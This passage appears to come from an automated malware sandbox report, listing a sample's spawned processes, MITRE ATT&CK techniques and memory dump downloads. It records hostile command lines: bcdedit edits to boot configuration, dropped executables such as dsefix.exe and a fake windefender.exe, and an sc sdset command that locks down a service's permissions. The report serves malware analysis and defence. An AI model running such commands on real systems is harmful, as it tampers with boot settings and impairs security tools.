    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1048
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1500
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1152
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1876
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:520
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      Executes dropped EXE
      PID:268
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1680
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:916

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/336-1-0x0000000002E20000-0x0000000002E31000-memory.dmp

Filesize
68KB

Download
memory/336-0-0x0000000002A70000-0x0000000002E16000-memory.dmp

Filesize
3.6MB

Download
memory/1828-11-0x0000000002D30000-0x0000000002D41000-memory.dmp

Filesize
68KB

Download
memory/1828-10-0x0000000002980000-0x0000000002D26000-memory.dmp

Filesize
3.6MB

Download
memory/1848-3-0x0000000002CE0000-0x0000000002CF1000-memory.dmp

Filesize
68KB

Download
memory/1848-2-0x0000000002930000-0x0000000002CD6000-memory.dmp

Filesize
3.6MB

Download
memory/2000-26-0x0000000002F10000-0x0000000002F11000-memory.dmp

Filesize
4KB

Download